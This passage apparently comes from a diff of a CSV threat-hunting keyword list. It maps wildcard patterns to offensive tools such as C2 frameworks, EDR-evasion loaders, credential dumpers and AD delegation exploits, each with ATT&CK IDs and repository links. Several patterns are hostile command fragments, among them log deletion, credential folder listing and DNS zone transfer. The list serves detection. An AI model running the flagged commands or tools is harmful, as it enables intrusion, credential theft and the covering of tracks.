+"*DefenseEvasion_SubvertTrustControls_CloneSSLPem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DeimosC2*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. 
deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*deleg_enum_imp*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*Delegation/delegation.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*delegation_constrained_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
+"*delegation_constrained_w_protocol_transition_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
+"*delegation_rbcd_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 
- T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
+"*delegation_unconstrained_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z"
+"*DelegationBOF.*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
+"*deliver.exe -d -c * -f*.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. 
Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z"
+"*deliver.exe -d -f *.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z"
+"*dementor.py -d * -u * -p *","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","rough PoC to connect to spoolss to elicit machine account authentication","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
+"*demo-bof.cna*","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","210","46","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z"
+"*demo-client.exe *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*demo-controller.exe *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*Dendrobate-master*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
+"*dendron*FileMonInject.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook 
unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z"
+"*deploycaptureserver.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z"
+"*DeployPrinterNightmare.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*DesertNut.csproj*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*DesertNut.exe*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*DesertNut.sln*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*DesertNut_h.cs*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*-destPipe * -pipeHost * -bindPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z"
+"*details-c80a6994018b23dc.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*detect ntdll.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - 
T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*detect-hooksx64.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" +"*devtunnel create *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*devtunnel host -p *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*devtunnel* user login -d*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*devtunnel.exe *","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*dfkdflfgjdajbhocmfjolpjbebdkcjog*","greyware_tool_keyword","Free Avira Phantom VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dfscoerce.py -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dfscoerce.py*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" 
+"*dfscoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DFSCoerce-main*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" +"*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter 
Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*dhadilbmmjiooceioladdphemaliiobo*","greyware_tool_keyword","Free Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*dhcp6.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*Dialupass.exe*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Dialupass.zip*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. 
You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dicts*generic-usernames.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*dicts/ftp_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*dicts/ssh_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*dicts/ssh_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*diego-treitos/linux-smart-enumeration*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*dig * axfr *@*","greyware_tool_keyword","dig","dig","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dig *@* axfr*","greyware_tool_keyword","dig","classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dig axfr * @*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dinjector /i:* /p:*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"*DInjector.csproj*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - 
T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*DInjector.Detonator*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*DInjector.dll*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*DInjector/Dinjector*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*Dinjector-main*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*Dionach*PassHunt*","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. 
standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","60","36","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" +"*dir /a C:\pagefile.sys | findstr /R *","greyware_tool_keyword","find","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*dir C:\Users\*\AppData\Local\Microsoft\Credentials*","offensive_tool_keyword","dir","Find the IDs of protected secrets for a specific user","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dir_create2system.txt*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirb/wordlists*","offensive_tool_keyword","wordlists","package contains the 
